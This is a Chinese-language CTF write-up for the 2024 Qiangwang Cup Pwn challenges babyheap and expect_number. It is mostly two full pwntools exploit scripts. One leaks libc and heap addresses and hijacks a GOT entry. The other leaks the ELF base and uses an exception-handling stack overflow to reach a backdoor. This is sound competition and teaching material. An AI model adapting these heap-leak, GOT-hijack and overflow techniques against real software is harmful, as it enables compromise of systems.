2024强网杯线上赛Pwn

极限晋级线下,一共只出了三道解多的,正常发挥吧

chat_with_me是学弟做的,简单贴下babyheap和expect_number

已完成强网拟态、网鼎杯、强网杯都晋级的壮举,线下见!

babyheap

靠劫持ABS@got表来打印环境变量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ['tmux', 'sp', '-h']
local = 1
elf = ELF('./pwn')
if local:
p = process('./pwn')
libc = ELF('./libc-2.35.so')
else:
p = remote('127.0.0.1',9999)
libc = ELF('./libc-2.35.so')

sd = lambda s : p.send(s)
sl = lambda s : p.sendline(s)
sa = lambda n,s : p.sendafter(n,s)
sla = lambda n,s : p.sendlineafter(n,s)
rc = lambda n : p.recv(n)
rl = lambda : p.recvline()
ru = lambda s : p.recvuntil(s)
ra = lambda : p.recvall()
ia = lambda : p.interactive()
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

def lg(s):
success("%s >> 0x%x" % (s, eval(s)))

def bk(addr):
gdb.attach(p,"b *"+str(hex(addr)))

def debug(addr,PIE=True):
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
pause()
else:
gdb.attach(p,"b *{}".format(hex(addr)))

def cmd(op):
sla("Enter your choice: \n",str(op))

def add(size):
cmd(1)
sla("Enter your commodity size \n",str(size))

def free(index):
cmd(2)
sla("Enter which to delete: \n",str(index))

def edit(index,content):
cmd(3)
sla("Enter which to edit: \n",str(index))
sa("Input the content \n",content)

def show(index):
cmd(4)
sla("Enter which to show: \n",str(index))

def env(op):
cmd(5)
sa("Maybe you will be sad !\n",str(op))

def magic(addr,content):
cmd(6)
sa("Input your target addr \n",p64(addr))
sd(content)

add(0x520)

add(0x500)
add(0x510)
free(1)
free(3)
add(0x590)
show(1)

ru("The content is here \n")
libc_base = uu64(rc(8)[-8:]) - 0x21b110
rc(8)
heap_base = uu64(rc(8)[-8:]) - 0x1950
lg("libc_base")
lg("heap_base")

puts = libc_base + libc.sym['puts']

setenv_got1 = libc_base + 0x21a150 # __strchr_avx2
setenv_got2 = libc_base + 0x21a098 # __strlen_avx2

putenv_got1 = libc_base + 0x21a150 # __strchr_avx2
putenv_got2 = libc_base + 0x21a018 # __strnlen_avx2
putenv_got3 = libc_base + 0x21a160 # __memmove_avx_unaligned_erms
putenv_got4 = libc_base + 0x21a118 # __strncmp_avx2

rop_addr = heap_base + 0x1e90

magic(putenv_got4,p64(puts))

env(2)

ia()

expect_number

利用contine功能不断累加与地址+1,可以实现对unk_5520最低一字节的任意写,从而利用选项4的call rdx来调用sub_2984函数

image-20241103180303975

cat gift没任何东西,被骗了

然后就是一个含有异常处理的栈溢出,修改返回地址为有后门的try地址+1即可

image-20241103180309858

image-20241103180323967

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ['tmux', 'sp', '-h']
local = 1
elf = ELF('./expect_number')
if local:
p = process('./expect_number')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
p = remote('39.107.90.219',28738)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

sd = lambda s : p.send(s)
sl = lambda s : p.sendline(s)
sa = lambda n,s : p.sendafter(n,s)
sla = lambda n,s : p.sendlineafter(n,s)
rc = lambda n : p.recv(n)
rl = lambda : p.recvline()
ru = lambda s : p.recvuntil(s)
ra = lambda : p.recvall()
ia = lambda : p.interactive()
uu32 = lambda data : u32(data.ljust(4, b'\\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\\x00'))

def lg(s):
success("%s >> 0x%x" % (s, eval(s)))

def bk(addr):
gdb.attach(p,"b *"+str(hex(addr)))

def debug(addr,PIE=True):
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
pause()
else:
gdb.attach(p,"b *{}".format(hex(addr)))

def cmd(op):
sla(">> waiting for your choice \\n",str(op))

def go(num):
cmd(1)
sla(">> Which one do you choose? 2 or 1 or 0\\n",str(num))

# + - * / (1 2 3 4)
chose = [4,3,2,4,2,4,3,1,2,2,3,4,3,4,4,3,1,3,1,1,4,1,4,2,3,3,3,4,4,4,2,3,3,3,2,4,2,1,4,3,2,2,2,4,1,2,3,1,4,3,2,3,4,1,1,2,3,3,1,2,2,2,1,4,1,2,3,2,2,2,1,4,3,2,3,4,3,1,4,3,4,1,1,3,1,1,4,4,3,4,1,1,1,1,4,1,3,3,3,4,4,3,3,3,4,2,2,3,2,1,1,1,2,1,3,2,2,2,1,4,1,2,4,2,2,4,2,4,2,4,4,1,2,2,3,2,3,4,4,1,1,4,1,2,4,4,3,1,1,4,1,2,1,4,3,2,3,4,2,4,4,1,1,1,2,3,2,1,3,1,1,3,4,1,4,4,4,2,4,1,1,4,2,1,4,4,3,2,3,4,2,2,4,2,3,1,4,4,1,2,1,1,4,4,2,3,3,1,1,3,1,1,2,2,2,1,1,4,3,4,3,4,1,2,1,3,2,4,3,3,2,3,3,1,2,4,4,1,1,4,3,1,4,4,3,1,1,3,4,3,2,2,2,3,3,2,1,1,1,3,3,2,1,1,3,3,1,2,3,1,1,1,1,4,4,3,1,4,2,4,2,3,2,3,1,4,4,2,4,1,4,2,2,1,3,4,3,3,1,1,3,1,1,3,1,4,2,1,4,3,4,1,1,1,4,2,1,3,3,4,3,2,2,1,2,4,4,4,2,1,4,4,1,4,2,1,4,3,1,3,1,1,3,2,1,2,3,1,1,1,1,3,2,2,3,4,1,3,3,2,3,3,1,3,2,2,4,1,1,4,3,1,4,2,2,1,3,4,1,3,4,1,2,2,2,4,1,2,2,3,3,4,1,3,3,3,1,2,3,1,1,2,1,1,3,3,1,1,2,1,4,2,2,1,3,3,4,3,1,2,1,3,1,2,2,3,4,2,4,2,2,1,3,2,1,1,4,1,2,2,1,1,3,2,1,1,1,4,3,1,1,3,3,2,4,4,4,3,1,4,1,2,4,3,4,4,4,3,4,1,4,4,1,2,2,1,2,2,4,4,2,1,3,4,2,2,4,1,1,4,4,1,2,3,3,1,2,2,3,1,2,3,1,2,4,2,2,2,3,2,1,4,2,3,3,3,1,2,3,1,2,3,1,3,1,3,3,3,1,1,3,2,3,3,4,3,4,1,4,2,2,4,1,3,3,4,1,3,1,4,3,2,2,3,4,2,1,2,4,1,3,3,3,1,1,2,3,1,2,2,2,4,2,3,2,4,2,3,2,2,2,4,4,3,2,3,4,2,1,4,3,3,2,1,3,2,2,2,2,3,3,4,2,4,2,4,3,3,2,4,4,3,3,3,1,4,2,4,2,2,3,4,4,4,4,2,2,1,3,3,3,2,2,1,1,3,4,4,1,1,3,1,3,2,3,3,1,4,2,2,1,1,1,4,4,4,2,1,4,4,4,3,1,1,3,2,4,2,1,4,2,3,4,4,4,3,2,1,2,3,2,3,3,3,2,3,2,3,3,2,3,2,4,3,3,2,4,2,3,4,1,4,3,1,3,2,3,4,2,4,2,4,2,1,2,4,3,3,2,1,4,4,3,3,3,1,4,2,2,2,2,2,1,4,2,3,1,4,2,3,4,4,2,1,4,3,4,2,1,2,2,1,1,4,3,3,4,3,1,1,4,2,3,1,1,4,3,1,4,1,3,3,4,4,3,3,2,3,4,3,4,1,3,4,1,1,3,4,3,3,1,3,4,3,3,4,2,1,4,1,1,3,3,4,2,2,2,4,4,1,2,3,2,4,2,2,4,4,1,3,2,1,1,1,3,3,4,1,3,4,1,4,2,4,3,3,1,1,2,4,1,3,2,2,2,3,3,2,3,4,4,4,4,4,1,3,2,4,3,4,3,3,3,4,2,2,3,2,2,4,1,2,3,2,4,4,1,2,1,3,1,4,2,1,3,2,3,4,2,1,4,4,3,2,4,1,3,2,2,4,1,3,2,3,4,1,3,4,2,3,2,3,3,4,3,1,1,1,1,2,1,4,2,3,1,1,3,4,2,1,3,2,3,4,1,2,4,3,2,2,1,3,4,3,2,2,4,3,2,4,4,2,3,1,4,3,1,3,2,2,3,1,4,1,4,4,2,4,2,3,1,2,2,4,1,3,1,4,1,2,3,1,3,1,1,2,3,2,4,1,3,2,1,2,2,4,1,4,3,2,2,3,4,3,2,4,2,2,3,2,3,1,2,1,1,3,3,3,4,2,3,2,4,3]

def show():
cmd(2)

def submit():
cmd(3)

def magic():
cmd(4)

flag1 = 3
flag2 = 5

# 96 = 3 * 2^5

for i in range(0x40):
if(chose[i]==1):
if(flag1):
flag1-=1
go(1)
else:
go(0)
if(chose[i]==2):
go(0)
if(chose[i]==3):
go(1)
if(chose[i]==4):
go(1)

for i in range(0x40,0x114):
if(chose[i]==1):
go(0)
if(chose[i]==2):
go(0)
if(chose[i]==3):
if(flag2):
flag2-=1
go(2)
else:
go(1)
if(chose[i]==4):
go(1)

show()
ru("History is : ")
rc(0x114)
elf_base = uu64(rc(6)[-6:]) - 0x4c60
lg("elf_base")

catch = elf_base + 0x2516
backdoor = elf_base + 0x253D
bss = elf_base + 0x5040 + 0xa00
lg("catch")

submit()
payload = p64(bss)*5 + p64(catch)
magic()

sa("Tell me your favorite number.",payload)

ia()